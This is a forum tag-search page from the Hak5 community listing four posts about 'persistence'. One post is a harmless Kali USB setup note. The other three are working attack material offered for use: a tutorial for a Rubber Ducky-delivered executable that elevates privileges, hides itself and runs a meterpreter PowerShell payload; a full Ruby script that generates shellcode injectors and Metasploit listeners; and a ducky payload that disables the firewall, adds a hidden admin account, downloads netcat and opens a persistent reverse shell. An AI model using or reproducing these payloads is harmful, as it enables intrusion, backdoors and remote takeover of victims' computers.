Jump to content

Search the Community

Showing results for tags 'persistence'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 4 results

  1. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  2. Recently installed Kali to my RPi3, and also to a USB drive for use on my Ubuntu16/Win10 laptop. Today I tried to make the Kali USB drive 'persistent,' and I thought maybe some people even more newbie than me might be interested in hearing what i had to do to make it work. Following the instructions blindly doesn't always work: (1) Creating the USB drive, no problem: https://docs.kali.org/downloading/kali-linux-live-usb-install However i had to do it using Win32 Disk Imager, because when i used the 'dd' method (from Ubuntu16 in a VirtualBox) it ran all night and still hadn't finished. So, Win32 imager. (2) Then on to make the Kali installation have 'persistence' so it would save settings and be able to save downloaded applications and scripts: https://docs.kali.org/downloading/kali-linux-live-usb-persistence ... which is where i began to have some problems. Under Step 1. i wasn't getting the prescribed sdb1 and sdb2. I had 3 sdb drives already. So i went back and repeated the Win32 Disk Imager process, and then doing fdisk -l on the usb drive, in a Ubuntu16 machine, showed me sdb1 and sdb2. ... Step 2. went well, in my case it was kali-linux-2018.1-i386.iso and i executed each line in Step 2 separately, waiting for each process to finish. ... Step 3. again execute each line separately and wait for each one to finish before going on to the next. ... Step 4. is where i was baffled; i wasn't getting persistence on re-boot. It turns out the directory wasn't being created, nor was the persistence.conf file. I had to go to /mnt, create the directory, cd to it, create persistence.conf and enter the ' / union ' and save it. Then unmount. I think that is all i had to do. Create a dummy text file in my home directory, save it, re-boot into Kali Persistent mode, and voila i had persistence. ... To experienced users, this all must seem silly, but six months ago i would have been totally baffled by the instructions "not working." Even newer newbies may find this hair-pulling today useful. ... THEN: (3) Why wouldn't my command-line rtl-sdr WBFM script work? rtl_fm -f 93.3e6 -M wbfm -s 200000 -r 48k - | aplay -r 48000 -f S16_LE First, of course, sudo apt-get rtl-sdr. But my one-liner wouldn't put out because my Kali didn't have aplay. So: sudo apt-get install alsa-utils, then the script would run. Almost. This version of aplay didn't like ' -r 48k ' so i had to change that to ' -r 48000 '. Then i got my FM station. Audio quality poor, so i will have to tweak that script on Kali. On Ubuntu16 i think it sounded just fine. So that was my day today. NEXT: installing rfcat on my Pentoo USB stick. I haven't a clue, yet. I did figure out that 'sudo apt-get install' gets replaced by 'sudo emerge --ask' but it doesn't find rfcat anywhere out there. I'm probably doing something wrong? ... Cheers.
  3. Hey fellas i came across this reverse shell made by (James Cook @b00stfr3ak44) i was just curous how can i change this to a Persistence reverse shell , its currenty a .rb file. you execute it in terminal , but i would like to know how to change it. #!/usr/bin/env ruby # Thanks to @mattifestation exploit-monday.com and Dave Kennedy. # Written by James Cook @b00stfr3ak44 require 'base64' require 'readline' def print_error(text) print "\e[31m[-]\e[0m #{text}" end def print_success(text) print "\e[32m[+]\e[0m #{text}" end def print_info(text) print "\e[34m[*]\e[0m #{text}" end def get_input(text) print "\e[33m[!]\e[0m #{text}" end def rgets(prompt = '', default = '') choice = Readline.readline(prompt, false) choice == default if choice == '' choice end def select_host host_name = rgets('Enter the host ip to listen on: ') ip = host_name.split('.') if ip[0] == nil? || ip[1] == nil? || ip[2] == nil? || ip[3] == nil? print_error("Not a valid IP\n") select_host end print_success("Using #{host_name} as server\n") host_name end def select_port port = rgets('Port you would like to use or leave blank for [443]: ') if port == '' port = '443' print_success("Using #{port}\n") return port elsif !(1..65_535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) select_port else print_success("Using #{port}\n") return port end end def shellcode_gen(msf_path, host, port) print_info("Generating shellcode\n") msf_command = "#{msf_path}./msfvenom --payload " msf_command << "#{@set_payload} LHOST=#{host} LPORT=#{port} -f c" execute = `#{msf_command}` shellcode = clean_shellcode(execute) powershell_command = powershell_string(shellcode) final = to_ps_base64(powershell_command) final end def clean_shellcode(shellcode) shellcode = shellcode.gsub('\\', ',0') shellcode = shellcode.delete('+') shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..18] = '' shellcode end def to_ps_base64(command) Base64.encode64(command.split('').join("\x00") << "\x00").gsub!("\n", '') end def powershell_string(shellcode) s = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr ) s << 'VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, ' s << "uint flProtect);[DllImport(\"kernel32.dll\")]public static extern " s << 'IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, ' s << 'IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ' s << "IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern " s << "IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type " s << %(-memberDefinition $c -Name "Win32" -namespace Win32Functions ) s << "-passthru;[byte[]];[byte[]]$sc = #{shellcode};$size = 0x1000;if " s << '($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::' s << 'VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);' s << '$i++) {$w::memset([intPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::' s << "CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = " s << '[system.Convert]::ToBase64String([system.Text.Encoding]::Unicode.' s << 'GetBytes($1));if([intPtr]::Size -eq 8){$x86 = $env:SystemRoot + ' s << %("\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni ) s << %(-enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& ) s << %(powershell $cmd $gq";}) end def ducky_setup(encoded_command) print_info("Writing to file\n") s = "DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd\nENTER\nDELAY 500\n" s << "STRING powershell -nop -wind hidden -noni -enc #{encoded_command}\n" s << 'ENTER' File.open('powershell_reverse_ducky.txt', 'w') do |f| f.write(s) end print_success("File Complete\n") end def metasploit_setup(msf_path, host, port) print_info("Setting up Metasploit this may take a moment\n") rc_file = 'msf_listener.rc' file = File.open("#{rc_file}", 'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write('exploit -j') file.close system("#{msf_path}./msfconsole -r #{rc_file}") end begin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?('/opt/metasploit-framework/msfvenom') msf_path = ('/opt/metasploit-framework/') else print_error('Metasploit Not Found!') exit end @set_payload = 'windows/meterpreter/reverse_tcp' host = select_host port = select_port encoded_command = shellcode_gen(msf_path, host, port) ducky_setup(encoded_command) msf_setup = rgets('Would you like to start the listener?[yes/no] ') print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path, host, port) if msf_setup == 'yes' print_info("Good Bye!\n") end
  4. Hello, Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it... Opens an admin command prompt Creates an admin user (default creds: hacker | mysecretpassword) Disables the windows firewall Enables remote desktop Enables remote assistance Hides the newly created admin account from the Windows Welcome Screen Creates a VBScript to run a hidden instance of Netcat Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop) Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start) Calls the VBScript to launch the hidden netcat shell Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs) So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend. ~skysploit DELAY 5000 ESCAPE DELAY 300 CONTROL ESCAPE DELAY 300 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW DELAY 300 ENTER DELAY 800 STRING netsh firewall set opmode disable ENTER DELAY 300 STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add ENTER DELAY 200 STRING y ENTER DELAY 400 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING copy con nc.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER STRING echo cmdow @ /hid >> nc.bat ENTER STRING echo nc -nv 4444 -e cmd.exe >> nc.bat ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile(',c:\Windows\system32\nc.exe'); ENTER STRING cscript nc.vbs ENTER STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\ ENTER STRING echo cmdow @ /hid >> persistence.bat ENTER STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat ENTER STRING exit ENTER
  • Create New...